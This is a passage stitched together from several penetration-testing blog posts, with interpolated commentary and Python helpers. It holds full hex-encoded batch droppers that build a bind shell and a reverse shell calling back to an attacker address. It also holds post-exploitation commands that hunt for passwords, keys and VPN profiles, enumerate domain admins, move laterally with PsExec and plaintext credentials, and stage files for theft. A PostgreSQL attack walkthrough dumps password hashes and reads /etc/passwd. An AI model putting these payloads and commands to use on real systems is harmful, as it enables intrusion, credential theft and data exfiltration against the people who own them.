echo e 0400 >>123.hex && echo bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 48 f4 9d 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee e7 44 bb 1f 16 a9 ce 11  >>123.hex

echo e 0480 >>123.hex && echo 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 a8 92 52 e1 06 00 00 30 40 00 63 30 6d 64 00 81 3f 40 00 0c 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 61 71 63 1b 65 70 74 10 e1 69 73 db ca 6e 01 57 53 41 cb f9 61 72 f0 75 70 cf 18 68 23 6f 6e 73 1d 0e 62 69 94 64 19  >>123.hex

echo e 0500 >>123.hex && echo 9f c3 63 6b 65 74 bf 06 ff 03 e1 b1 91 1a 72 6e cd 6c 58 4a 47 c3 36 43 6f 6d 8b 61 37 5a 4c 62 cc 4c 80 fc 72 ed f7 3b a8 50 6f 6c ce 73 3b 21 00 00 00 00 00 00 81 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 ec be ff ff 00 00 00 02 00 00 00 0c 40 00 00  >>123.hex

echo r cx >>123.hex && echo 0477 >>123.hex && echo w >>123.hex && echo q >>123.hex && debug<123.hex && copy 1.dll bind.exe

rem *********CHANGE PORT NUMBER HERE******

bind.exe 8080

IF EXIST bind.exe GOTO kill

del %0

:kill

What is happening here is that the batch file writes a DEBUG script (123.hex) and feeds it to DEBUG.EXE, which assembles the bytes into 1.dll; that file is copied to bind.exe and executed, and bind.exe then listens on a port (8080 in this case, but you can and should change it to whatever port the situation calls for). Two caveats a practitioner should note. DEBUG.EXE is a 16-bit program, so this only works on 32-bit Windows; 64-bit Windows does not ship it. And read the clean-up logic carefully: the lines after bind.exe 8080 only run once bind.exe exits, and since bind.exe is still on disk at that point, IF EXIST bind.exe GOTO kill jumps past del %0. So this batch file only deletes itself when bind.exe is missing, and it never deletes 123.hex or 1.dll at all. That is not "no traces of evidence"; the reverse-shell version below at least removes its own DLL and hex file.

Let's check the listening sockets on the target with netstat -ano:

There she is, listening on port 8080. And just to be sure, let's run tasklist:

Now that we know the batch file worked, bind.exe is running and it is indeed listening, let's hop onto our attack Linux machine and see if we can get access. We simply netcat to the target machine (192.168.3.177 here) on port 8080 and...

Success! We have a shell. All that was done here was sending a message to every user logged on to the machine, but I'll let your imagination run wild with the possibilities of having Administrator access... you evil hacker, you.

Sending a reverse shell using a batch file

At this point, we are essentially going to do the same thing we did in the last exercise, except that instead of the attacker machine connecting to the target, the target machine will connect back and hand the attacker a shell. That direction matters in practice: outbound connections are usually filtered far less than inbound ones.

Let's take a look at the code:

echo off && echo n 2.dll >1234.hex

echo e 0100 >>1234.hex && echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 df 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  >>1234.hex

echo e 0180 >>1234.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 db 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >>1234.hex

echo e 0200 >>1234.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 ef 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13  >>1234.hex

echo e 0280 >>1234.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00  >>1234.hex

echo e 0300 >>1234.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 b0 42 00 00 bd 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c 06 32 40 07 6a 01 e8 0e 7c 38 55 0c e8 42 02 c8 15 38 9e 6a 7e 38 ea 53 0c 7a 50 2c 16 74 41 30 fd 01 bf 55 b2 b1 33 6a 91 02 06 b2 7c 55 9a 27 a3 78 83 66 c7 05 64 7b 4f a6 38 67 bc 5d 50 66 94 3d 39 66 a3 68 7e 64 66 7e 21 7d 8b 73 0c d9 0a 6a 68 94 2d a1  >>1234.hex

echo e 0380 >>1234.hex && echo 3a 7a 6f 48 15 ea 4c 05 11 50 64 90 10 4d 44 55 91 14 3c 40 78 6a 28 10 68 5d 28 ff 35 30 74 e8 a4 9e 51 54 55 a1 55 8d bf 6e 0e 0a 08 90 22 0b e1 51 14 e8 1f 81 4b c3 ff 25 24 20 bb 6f 2a 1c 06 43 18 21 14 bd c3 22 08 71 cc 01 55 8b ec 81 c4 7c fe ff 88 56 57 e8 60 ac dd 89 45 fc 33 1d c9 8b 75 7e 38 3c 1d 74 07 1e 22 40 f7 41 eb f4 51 d1 72 e9 00 e1 58 3b c1 74 0b 5f 5e 30 b8 03  >>1234.hex

echo e 0400 >>1234.hex && echo b9 c9 c2 08 e1 86 49 8d bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 38 f4 b0 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee  >>1234.hex

echo e 0480 >>1234.hex && echo e7 44 bb 1f 16 a9 ce 11 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 e2 30 83 c4 07 f4 6a f5 e8 69 09 19 49 ff bd 82 aa 20 0b d0 2a 93 75 37 f8 50 22 9d 29 86 06 fc e8 4d 2f 68 8b 24 38 e6 53 1a 0f 08 8d 50 03 21 18 83 c0 04 e3 f9 ff fe 80 02 f7 d3 23 cb 81 e1 44 80 74  >>1234.hex

echo e 0500 >>1234.hex && echo 7c e9 6c c1 0c 60 75 77 06 f4 10 c0 40 02 d0 e1 1b c2 51 5b 3a 47 c4 49 19 ca 0c 57 06 08 30 00 00 30 40 00 63 30 6d 64 00 66 3f 40 00 14 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 67 07 65 74 68 6f 73 40 62 79 6e 61 7b 6d cf 1e 63 9e 3c f7 eb ff 0e 12 57 53 41 5d cf 61 72 46 75 70 18 79 68 ca 2c 73 13 4f 26 63 6b 62 ef c1 ff b8 03 6c 95 1a 72 ca 5e 6c 4c c7 57 d3 69 74 f3 46  >>1234.hex

echo e 0580 >>1234.hex && echo a7 bc 91 47 c3 4c 43 6f 6d 88 61 6e 64 36 4c 69 44 62 7e 80 76 72 fb 9d 3a 50 b7 82 e7 73 15 41 58 21 c0 64 48 d0 43 2f 60 00 00 00 00 00 66 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 74 be ff ff 00 00 00 02 00 00 00 0c 40 00 00  >>1234.hex

echo r cx >>1234.hex && echo 04ef >>1234.hex && echo w >>1234.hex && echo q >>1234.hex && debug<1234.hex && copy 2.dll reverse.exe && del 2.dll && del 1234.hex

rem *******************EDIT YOUR HOSTNAME AND PORT HERE*************************

reverse.exe 192.168.2.18 31337

:deleteit

del reverse.exe

IF EXIST reverse.exe GOTO kill

del %0 

:kill

The code looks very similar to bind.bat from the last exercise and does essentially the same thing: it creates a hex (DEBUG script) file and a DLL that together become reverse.exe, runs it with the attacker's address and port on the command line (the shell is sent at that point), then deletes reverse.exe and, if that succeeded, the batch file itself. Unlike bind.bat, this version also deletes 2.dll and 1234.hex right after the copy.
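To see exactly what bind.bat and reverse.bat drop without running DEBUG.EXE on a 32-bit box, here is an added Python example of mine, not code from the post, that replays the echo redirections of such a batch file and emulates the handful of DEBUG commands the scripts use (n, e, r cx, w, q). The sample batch text inside it is constructed (a fake 8-byte file), not the page's payload; fed the two batch files above it yields the 1143-byte (cx=0477) and 1263-byte (cx=04ef) binaries, which you can then hash for detection or hand to a sandbox.

```python
import re

# Constructed stand-in for bind.bat / reverse.bat: the same echo/redirect shape,
# but the bytes are a fake 8-byte header, not the page's payload.
SAMPLE_BATCH = """echo off && echo n demo.bin >demo.hex
echo e 0100 >>demo.hex && echo 4d 5a 90 00 >>demo.hex
echo e 0104 >>demo.hex && echo 03 00 00 00 >>demo.hex
echo r cx >>demo.hex && echo 0008 >>demo.hex && echo w >>demo.hex && echo q >>demo.hex && debug<demo.hex && copy demo.bin demo.exe
"""

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*(>>|>)\s*(\S+)$", re.IGNORECASE)


def batch_to_scripts(batch_text):
    """Replay the echo redirections: {script file name: [lines the batch wrote into it]}."""
    files = {}
    for line in batch_text.splitlines():
        for cmd in line.split("&&"):
            m = ECHO_RE.match(cmd.strip())
            if not m:
                continue  # 'echo off', 'debug<...', 'copy ...' do not write the script
            text, op, name = m.groups()
            if op == ">":
                files[name] = []  # '>' truncates, '>>' appends
            files.setdefault(name, []).append(text.strip())
    return files


def emulate_debug(script_lines):
    """Emulate the subset of DEBUG.EXE the droppers rely on: n, e, r cx, w, q.
    DEBUG loads and writes the file at CS:0100, so 'e 0100' is file offset 0,
    'e 0280' is offset 0x180, and 'r cx' sets how many bytes 'w' writes."""
    image = bytearray(0x10000)
    name, cx, out = None, 0, b""
    lines = iter(script_lines)
    for line in lines:
        parts = line.split()
        if not parts:
            continue
        cmd = parts[0].lower()
        if cmd == "n":
            name = parts[1]
        elif cmd == "e":
            addr = int(parts[1], 16)
            # the batch files echo 'e ADDR' and then the bytes on the following line
            values = parts[2:] or next(lines).split()
            for i, v in enumerate(values):
                image[addr + i] = int(v, 16)
        elif cmd == "r" and len(parts) > 1 and parts[1].lower() == "cx":
            cx = int(next(lines).split()[0], 16)  # DEBUG prompts; the next line is the new CX
        elif cmd == "w":
            out = bytes(image[0x100:0x100 + cx])
        elif cmd == "q":
            break
    return name, out


def recover_payloads(batch_text):
    """{output file: bytes} for every DEBUG script the batch file builds."""
    return dict(emulate_debug(lines) for lines in batch_to_scripts(batch_text).values())


if __name__ == "__main__":
    for fname, blob in recover_payloads(SAMPLE_BATCH).items():
        print(fname, len(blob), blob[:2])
```

Point it at the real batch files with recover_payloads(open("bind.bat").read()); the returned bytes are what ends up in 1.dll, so a SHA-256 of them is a usable detection artifact even on hosts where the dropper itself was deleted.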

First of all, we need to set our attack box to listen on a port; let's choose 31337 for this exercise. We will be using netcat again (isn't it an excellent tool?) to listen on port 31337:

Next, we simply run the batch file on the target machine:

And like clockwork, we have our shell!

Escaping and getting a command prompt

First things first: we need a command prompt before we can do anything else. Open Task Manager with Ctrl+Alt+Delete (or Ctrl+Shift+Esc), go to File > New Task (Run...) and type cmd.exe. That spawns a new command prompt. If there is no physical keyboard, start a new task and type osk.exe for the on-screen keyboard instead:


Here is an image of the On-Screen Keyboard:


Next, use Internet Explorer (or whatever browser is installed, but there is a good chance it is IE) to navigate to a website that hosts your favorite tools and exploits. Whew, well alrighty then, I hope that you enjoyed this blog post.

I’d love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

Let’s call it quits right there, and I’ll come back in a day or so and give you something else to chew on.


Happy Hacking

Using APT tactics and techniques in your pentests

I have a student who has been asking me about internal network penetration testing, so I figured I'd write a blog post about APT tactics. I was trying to explain to him that there is so much more to it than just popping boxes. Breaking into a machine is easy; moving around a network and stealing data without getting caught is the real skill. To do that, you will want to use the Tactics, Techniques, and Procedures (TTPs) employed by Advanced Persistent Threat (APT) actors.

When I do network penetration tests, I always explain to the customer that there are four levels of post exploitation. Therefore, they need to choose what level they want me to use based on the goals of the test.

  • Level 1: Access – proving that you can gain access to hosts.
  • Level 2: Leveraged Access – showing that you can jump from initially compromised hosts and move further to other hosts in the network.
  • Level 3: Data Driven Access – going after the target organization’s intellectual property, trade secrets or financials
  • Level 4:  Long term command and control (C2) – staying persistent in the environment for a prolonged period then exfiltrating data out of the network.

I'll try to cover a few of the things we pentesters do on internal pentests to data mine the network.

Data Mining The Host

At this point, you have just broken into a machine with a browser, PDF, or Java exploit and you are sitting at your meterpreter prompt. You could run a few meterpreter scripts like winenum.rb, enum_domain_user, file_collector.rb, int_doc_find.rb or similar. Even so, I am going to walk you through doing this without meterpreter scripts so that, from here on, you understand what those scripts are doing and can write your own.

Let's start by turning our meterpreter session into a regular shell:

meterpreter> execute -c -H -f cmd -a "/k" -i

 


Then, let's figure out which updates are installed on this computer. On Windows 7/8 use DISM (note: DISM returns far more detail than WMIC):

C:\>DISM /Online /Get-Packages

 


or:

C:\>WMIC QFE List

 


Now that we have a regular command prompt, we will search the drive and sort the files by last-access time. This is a quick way to find the files that are actually in use:

C:\>dir C:\ /S /OD /TA

Alternatively, if you know the date a particular file was created, you can search the drive and sort by creation time:

C:\>dir C:\ /S /OD /TC

You can also do the same thing based on modification date, sorting the files by last-write time:

C:\>dir C:\ /S /OD /TW

Here is a trick I use a lot: search the drive for files with business-critical words in the file names. I type the following:

C:\>dir c:\*bank* /s

C:\>dir c:\*password* /s

C:\>dir c:\*pass* /s

C:\>dir c:\*competitor* /s

C:\>dir c:\*finance* /s

Here is another set of goodies for financial and risk related data:

C:\>dir c:\*invoice* /s

C:\>dir c:\*risk* /s

C:\>dir c:\*assessment* /s

Further, these are good when you are looking for specific file types, for instance .key or .pem files for encryption keys and .crt files for certificates, .vsd files for Visio network diagrams, .pcf files for Cisco VPN client profiles, .ica files for Citrix connections, and log files:

C:\>dir c:\*.key* /s

C:\>dir c:\*.vsd /s

C:\>dir c:\*.pcf /s

C:\>dir c:\*.ica /s

C:\>dir c:\*.crt /s

C:\>dir c:\*.log /s

I look especially hard for .pcf and .ica files: anything that can give me legitimate access to the network. There is no better backdoor than authorized access.

As a matter of fact, I did have a pentest where the customer had the password file named GeorgeBush.xlxs (yes, every network has a password text file or spreadsheet). Evidently, a penetration tester before me had found the password file when it was called passwords.xlsx, so they renamed it. However, you can search a drive for files with critical data by other means than their names. Start with the unattended-install answer files, which often carry a local administrator password, then run findstr from the root of the drive (/S recurses from the current directory, /I ignores case, /N prints line numbers and /P skips binary files):

C:\>type c:\sysprep.inf

C:\>type c:\sysprep\sysprep.xml

C:\>findstr /I /N /S /P /C:password *

C:\>findstr /I /N /S /P /C:secret *

C:\>findstr /I /N /S /P /C:confidential *

C:\>findstr /I /N /S /P /C:account *

C:\>findstr /I /N /S /P /C:payroll *

C:\>findstr /I /N /S /P /C:credit *

C:\>findstr /I /N /S /P /C:record *
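The dir and findstr runs above are really one procedure: find files by name, by extension, by timestamp, and by content. Here is an added Python example of mine (not the post's code) that performs the same three searches over a directory tree, which is handy when you are triaging a mounted disk image or a file share rather than sitting at a cmd prompt. The keyword lists are the ones from the commands above, the sample tree it builds is constructed, and on a live Windows host you would point it at C:\ instead.

```python
import os
import re
import tempfile

# Name fragments and extensions the dir /s commands above look for
NAME_WORDS = ["bank", "password", "pass", "competitor", "finance",
              "invoice", "risk", "assessment"]
EXTENSIONS = [".key", ".pem", ".vsd", ".pcf", ".ica", ".crt", ".log"]
# Strings the findstr /I /S commands above look for inside files
CONTENT_WORDS = ["password", "secret", "confidential", "account",
                 "payroll", "credit", "record"]


def walk_files(root):
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            yield os.path.join(dirpath, name)


def interesting_names(root):
    """Equivalent of 'dir c:*bank* /s', 'dir c:*.pcf /s' and friends: (path, reasons)."""
    hits = []
    for path in walk_files(root):
        low = os.path.basename(path).lower()
        why = [w for w in NAME_WORDS if w in low] + [e for e in EXTENSIONS if low.endswith(e)]
        if why:
            hits.append((path, why))
    return hits


def grep_contents(root, words=CONTENT_WORDS, max_bytes=1_000_000):
    """Equivalent of 'findstr /I /N /S /P /C:word *': (path, line number, word) per matching line.
    /P makes findstr skip files with non-printable characters; a NUL byte is the usual tell."""
    pattern = re.compile("|".join(re.escape(w) for w in words), re.IGNORECASE)
    hits = []
    for path in walk_files(root):
        try:
            with open(path, "rb") as fh:
                data = fh.read(max_bytes)
        except OSError:
            continue
        if b"\x00" in data:
            continue
        for lineno, line in enumerate(data.decode("utf-8", "replace").splitlines(), 1):
            match = pattern.search(line)
            if match:
                hits.append((path, lineno, match.group(0).lower()))
    return hits


def recently_touched(root, stamp="mtime", limit=10):
    """Equivalent of 'dir /S /OD /TW' (mtime), '/TA' (atime) or '/TC' (ctime), newest first.
    On Windows st_ctime is the creation time that /TC sorts on; on Linux it is inode change time."""
    attr = {"mtime": "st_mtime", "atime": "st_atime", "ctime": "st_ctime"}[stamp]
    stamped = []
    for path in walk_files(root):
        try:
            stamped.append((getattr(os.stat(path), attr), path))
        except OSError:
            continue
    return [p for _, p in sorted(stamped, reverse=True)[:limit]]


def report(root):
    """All three searches at once, keyed by file name, which is what you triage first."""
    return {
        "names": {os.path.basename(p): why for p, why in interesting_names(root)},
        "content": {(os.path.basename(p), n, w) for p, n, w in grep_contents(root)},
        "recent": [os.path.basename(p) for p in recently_touched(root)],
    }


def build_sample_tree():
    """Constructed stand-in for a pilfered drive (not data from any engagement)."""
    root = tempfile.mkdtemp(prefix="datamine_")
    sample = {
        os.path.join("Finance", "Q3_invoice.xlsx"): b"amount,1200\n",
        os.path.join("IT", "vpn-corp.pcf"): b"[main]\nHost=vpn.example.invalid\n",
        os.path.join("HR", "GeorgeBush.txt"): b"payroll system\nadmin password: hunter2\n",
        os.path.join("bin", "tool.exe"): b"MZ\x00\x00password\x00",
    }
    for rel, content in sample.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    print(report(build_sample_tree()))
```

Note that the content grep finds the renamed GeorgeBush.txt through its contents while the name search does not, which is exactly the point of running findstr after dir; and the binary tool.exe containing the string "password" is skipped the way findstr /P skips it.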


Active Directory Enumeration

Now that you have pilfered the host you compromised, it's time to spread your wings and look for new prey in the network, so we move on to Active Directory enumeration. Lateral movement proper will get its own blog post later.

I like using the net view command to look for other hosts in the network:

C:\>net view


In addition, we can run net view /domain to get a list of domains and workgroups in the target environment:

C:\>net view /domain

Next, let's look for local users (always check this; every once in a while you'll run into a network that uses local accounts for things). System administrators often use local users and groups for administration tasks as a way of restricting access to the domain. Done carefully this can be fine, but it is often atrocious, because it pushes the admin into using the same local administrator password on every machine in the environment, and one cracked hash then opens every box:

C:\>net user

At this point, let's grab a list of users in the domain:

C:\>net user /domain

For the same reason we checked for local users, we check the local groups as well:

C:\>net localgroup

C:\>net localgroup /domain

C:\>net localgroup administrators

Now it's time to get serious. The next few commands are where I get the best info. Note that with /domain, net localgroup and net group are answered by the domain controller, so the next command lists the members of the DC's built-in Administrators group rather than this machine's:

C:\>net localgroup administrators /domain

Finding out the users in the domain is always handy, but there is nothing like the next command:

C:\>net group "Domain Users" /domain

This is where you make your money. I always look for the users in the Domain Admins group: after compromising my first host, I spear phish any user I find in Domain Admins. That's the fastest way to domain admin level access for me.

C:\>net group "Domain Admins" /domain

C:\>net user "jima" /domain

OK, at this point, let’s start moving around the network.

No Nmap – no problem. If you have time (because this is REALLY slow), you can ping sweep the network via a batch file.

Here is how to build pingsweep.bat from the command line (the second echo is one long line), then view it with more:

echo @echo off > pingsweep.bat

echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat

more pingsweep.bat

Afterward, all you have to do is type pingsweep and then the first three octets of the target subnet:

pingsweep 10.10.30

If you need to generate a list of IP addresses instead, this quick for loop does it:

for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt

more ips.txt

Further, let's echo some domain user names into a text file for later use:

echo heat >> names.txt

echo jima >> names.txt

echo roge >> names.txt

echo patr >> names.txt

echo jami >> names.txt

echo bonn >> names.txt

echo rhon >> names.txt

echo sall >> names.txt

echo joyj >> names.txt

echo laur >> names.txt

echo sloa >> names.txt

echo Administrator >> names.txt

more names.txt


Then, we can use a for loop to pull the host names out of the net view output into hosts.txt:

for /f "tokens=1" %a in ('net view ^| find "\\"') do @echo %a >> hosts.txt

PsExec

Once you come across machines where users are logged in, and you have their passwords or hashes, you can PsExec to those machines. I acknowledge that I skipped password stealing and hash dumping; I will cover them in another article if you guys still want me to.

PsExec in Windows

C:\>psexec.exe /accepteula \\10.10.30.81 -u administrator -p [email protected]! cmd.exe

PsExec in Linux

Just for the sake of making sure that you have the syntax, here is how to do the PsExec equivalent from Linux. I prefer a tool called winexe, and I have a copy on my Amazon S3 if you want to download it from me:

cd ~/toolz

wget https://s3.amazonaws.com/StrategicSec-Files/winexe

chmod 777 winexe

./winexe -U Administrator%[email protected]! //WIN7-X64-1 cmd.exe


Here is how I figure out how many users are logged on to or connected to a server:

NET SESSION | FIND /C "\\"

Finally, just move with psexec to the next machine and do the host data mining all over again (lather, rinse, repeat): run all of the dir commands again, run all of the findstr commands again, grab the files you need, map a drive to whatever you have chosen as your staging server, and copy the files there. Here is how to map a network drive and disconnect it again when you are done:

net use O: \\10.10.30.89\c$  /u:administrator [email protected]!

net use /d O:


Whew, this was quite a long blog post. We covered a lot today, however, there is a lot we didn’t cover. We didn’t cover password stealing, hashdump, pass the hash, as well as data exfiltration.

Finally, I’d love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

Let’s call it quits right there, and I’ll probably come back in a day or so and give you something else to chew.

 


ATTACKING DELL FOGLIGHT SERVER

I was just talking to someone a little while ago, and I told them how I rarely run into Postgres on pentests. However, I have run into Foglight, which is a Postgres-based product. Ok, so what is a Dell Foglight box? A while back, I ran into one of these while I was on a pentest.

Meanwhile, let’s see…”Dell’s application performance monitoring (APM) solution, Foglight, blends business context with deep technical insight, unifying all users and data within a structured model built around transactions – leveraging our patent-pending Transaction DNA technology.

Source: http://software.dell.com/products/foglight-application-performance-monitoring/

Next, here is a quick walk-through of me attacking Dell Foglight using Nmap NSE, some Postgres syntax, Metasploit, and a free hash lookup website called CrackStation.net. It also covers the proper remediation for the attack. Yes, basically, I sanitized a pentest compromise notification document and turned it into a blog post. But c'mon, it's been a really busy week and this is still good stuff.

In the meantime, we will get started….

My Attack Virtual Machine

Here is the virtual machine that I used for this:

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip

username: strategicsec

password: strategicsec

Nmap Syntax

At this point, we use Nmap to show how an attacker would identify a host running Postgres.

First, we scan TCP port 5432 with version detection to verify the host is running PostgreSQL:

sudo nmap -sV -p 5432 XXX.XXX.XXX.XXX

Next, we execute the NSE script pgsql-brute against the system:

sudo nmap -sV -p 5432 --script pgsql-brute XXX.XXX.XXX.XXX

NMap Attack Syntax Reference:

http://nmap.org/nsedoc/scripts/pgsql-brute.html

PSQL Attack Syntax

Here, we use the command-line Postgres client psql to connect to the database (role names are case-sensitive, so it is postgres, not Postgres; -W forces a password prompt and the last argument is the database name):

psql -h XXX.XXX.XXX.XXX -U postgres -W postgres

Next, we list all the databases on the postgres system:

\l

 


Afterward, we list the database roles and their hashed passwords (these are database accounts, not system accounts; reading pg_shadow requires superuser rights, which the postgres role has). Note that the column is usename, not username, and that a value of the form md5<hex> is the MD5 of the password with the role name appended as the salt:

select usename, passwd from pg_shadow;

Next, we select the current database:

select current_database();


 

Next, we create a temporary table called secureninja to hold any server-side data we want to examine:

create table secureninja (input TEXT);

Next, we copy the /etc/passwd file into the secureninja table we just created. COPY ... FROM a server-side file runs as a superuser and reads the file as the postgres OS user, so any file that user can read (application configuration files with credentials included) can be pulled the same way:

copy secureninja from '/etc/passwd';

Next, we display the /etc/passwd data that we copied into the secureninja table:

select input from secureninja;


Next, we delete the temporary table from the customer database:

drop table secureninja;


Next, we exit the Postgres database:

\q


Using a website like https://crackstation.net/, we can check the hashes for each database role (vkernel, root, postgres). Strip the md5 prefix before submitting the 32 hex characters, and remember that the pre-image it reports is the password followed by the role name.
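The pg_shadow rows above (and the Metasploit postgres_hashdump output further down) are the only thing you take off the box, so here is an added Python example of mine, not code from the post, that shows how the stored value is built and checks candidate passwords offline against it without any web service. The sample psql output is constructed: the hashes are computed in the block from assumed passwords (postgres/postgres and vkernel/vkernel, matching the role names the Dell KB below uses), not copied from an appliance, and the wordlist is an assumption too.

```python
import hashlib


def pg_md5(password, username):
    """PostgreSQL's md5 password storage: 'md5' + md5(password || username).
    The role name is the salt, so the same password hashes differently for each role."""
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()


def parse_pg_shadow(psql_output):
    """Turn the rows of 'select usename, passwd from pg_shadow;' as psql prints them into {role: stored}."""
    roles = {}
    for row in psql_output.splitlines():
        if "|" not in row or row.strip().startswith("-"):
            continue  # separator line, '(n rows)', blank
        user, stored = (col.strip() for col in row.split("|", 1))
        roles[user] = stored
    return roles


def crack(roles, wordlist):
    """Offline check of candidate passwords; returns {role: password} for each md5 role that matches."""
    found = {}
    for user, stored in roles.items():
        if not stored.startswith("md5"):
            continue  # header row, NULL, or SCRAM-SHA-256: not covered here
        for candidate in wordlist:
            if pg_md5(candidate, user) == stored:
                found[user] = candidate
                break
    return found


# Constructed sample of psql output. The hashes are computed here from assumed
# passwords (postgres/postgres, vkernel/vkernel); they are not an appliance's real hashes.
SAMPLE_PG_SHADOW = "\n".join([
    " usename  |               passwd",
    "----------+-------------------------------------",
    " postgres | " + pg_md5("postgres", "postgres"),
    " vkernel  | " + pg_md5("vkernel", "vkernel"),
    "(2 rows)",
])

# Targeted wordlist (assumed): product and role names, the KB defaults, the usual suspects.
WORDLIST = ["password", "postgres", "vkernel", "foglight", "Password1"]

if __name__ == "__main__":
    print(crack(parse_pg_shadow(SAMPLE_PG_SHADOW), WORDLIST))
```

Because the role name is folded into the hash, a generic MD5 lookup only helps when the table happens to contain the concatenation; a short targeted wordlist built from the product, the customer and the role names is usually faster, and it is the same check you would run as the defender to confirm the defaults are gone after the remediation below.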

 


Here we start to use a common hacker tool called Metasploit to attack the database:

cd /home/strategicsec/toolz/metasploit

sudo ./msfconsole

